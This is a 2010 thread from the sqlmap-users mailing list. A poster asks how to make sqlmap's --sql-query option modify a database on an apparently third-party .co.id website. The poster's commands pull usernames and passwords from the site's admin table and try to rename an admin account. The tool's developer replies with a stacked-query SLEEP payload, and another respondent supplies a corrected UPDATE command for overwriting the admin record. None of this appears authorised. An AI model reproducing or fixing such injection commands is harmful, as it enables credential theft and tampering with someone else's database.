Thread: Re: [sqlmap-users] --sql-query UPDATE Problem

Brought to you by: inquisb

sqlmap-users

Re: [sqlmap-users] --sql-query UPDATE Problem

From: <dig...@pr...> - 2010-09-24 21:30:41

hi
can u help me how to use command --sql-query to Update database or 
entry data

i use command like this :

--sql-query "SELECT username, password FROM h64570.admin LIMIT 1, 3" -v 
2
--sql-query "UPDATE username set=digitalcat FROM h64570.admin LIMIT 1, 
3" -v 2
--sql-query "UPDATE SET username 'digitalcat' WHERE username 'aris' 
FROM h64570.admin" -v 2

but result always :

UPDATE SET username 'digitalcat' WHERE username 'aris' FROM 
h64570.admin:    'None'

[INFO] Fetched data logged to text files under 
'C:\sqlmap\output\ht-xxxx.co.id'


pelase help me..

thanks

Re: [sqlmap-users] --sql-query UPDATE Problem

From: Miroslav S. <mir...@gm...> - 2010-09-24 22:05:20

hi.

for sql query option to work (timed) stacked queries have to be
supported by the vulnerable web site (like: ";SELECT SLEEP(1000)"). in
your option this probably wasn't the case. sorry for inconvenience for
not showing some kind of warning message. with the latest SVN commit
you should be warned in this kind of cases.

bye.

On Fri, Sep 24, 2010 at 11:17 PM,  <dig...@pr...> wrote:
>
> hi
> can u help me how to use command --sql-query to Update database or
> entry data
>
> i use command like this :
>
> --sql-query "SELECT username, password FROM h64570.admin LIMIT 1, 3" -v
> 2
> --sql-query "UPDATE username set=digitalcat FROM h64570.admin LIMIT 1,
> 3" -v 2
> --sql-query "UPDATE SET username 'digitalcat' WHERE username 'aris'
> FROM h64570.admin" -v 2
>
> but result always :
>
> UPDATE SET username 'digitalcat' WHERE username 'aris' FROM
> h64570.admin:    'None'
>
> [INFO] Fetched data logged to text files under
> 'C:\sqlmap\output\ht-xxxx.co.id'
>
>
> pelase help me..
>
> thanks
>
>
> ------------------------------------------------------------------------------
> Start uncovering the many advantages of virtual appliances
> and start using them to simplify application deployment and
> accelerate your shift to cloud computing.
> http://p.sf.net/sfu/novell-sfdev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar (Croatia/Zagreb)

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B

Re: [sqlmap-users] --sql-query UPDATE Problem

From: Carlos G. V. <car...@gm...> - 2010-09-27 16:52:26

Sorry, but i think your query is not right. The sintax of the update
sentence is something like this:

update SOMETABLE set FIELD1='value1', FIELD2=0, FIELD3=null where FIELD4=15

In other words:

update <tablename> set <field list asignation separated by comma>
where <condition to select rows to be affected>

Looking at your query, you may want to do this:

--sql-query "UPDATE h64570.admin SET username='digitalcat' WHERE
username='aris' " -v 2

I hope it helps. Good luck!

-- 
--------8<--------
Carlos Gabriel Vergara
http://www.ThorSecurity.com.ar

PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
-------->8--------

2010/9/24 Miroslav Stampar <mir...@gm...>:
> hi.
>
> for sql query option to work (timed) stacked queries have to be
> supported by the vulnerable web site (like: ";SELECT SLEEP(1000)"). in
> your option this probably wasn't the case. sorry for inconvenience for
> not showing some kind of warning message. with the latest SVN commit
> you should be warned in this kind of cases.
>
> bye.
>
> On Fri, Sep 24, 2010 at 11:17 PM,  <dig...@pr...> wrote:
>>
>> hi
>> can u help me how to use command --sql-query to Update database or
>> entry data
>>
>> i use command like this :
>>
>> --sql-query "SELECT username, password FROM h64570.admin LIMIT 1, 3" -v
>> 2
>> --sql-query "UPDATE username set=digitalcat FROM h64570.admin LIMIT 1,
>> 3" -v 2
>> --sql-query "UPDATE SET username 'digitalcat' WHERE username 'aris'
>> FROM h64570.admin" -v 2
>>
>> but result always :
>>
>> UPDATE SET username 'digitalcat' WHERE username 'aris' FROM
>> h64570.admin:    'None'
>>
>> [INFO] Fetched data logged to text files under
>> 'C:\sqlmap\output\ht-xxxx.co.id'
>>
>>
>> pelase help me..
>>
>> thanks
>>
>>
>> ------------------------------------------------------------------------------
>> Start uncovering the many advantages of virtual appliances
>> and start using them to simplify application deployment and
>> accelerate your shift to cloud computing.
>> http://p.sf.net/sfu/novell-sfdev2dev
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar (Croatia/Zagreb)
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
>
> ------------------------------------------------------------------------------
> Start uncovering the many advantages of virtual appliances
> and start using them to simplify application deployment and
> accelerate your shift to cloud computing.
> http://p.sf.net/sfu/novell-sfdev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>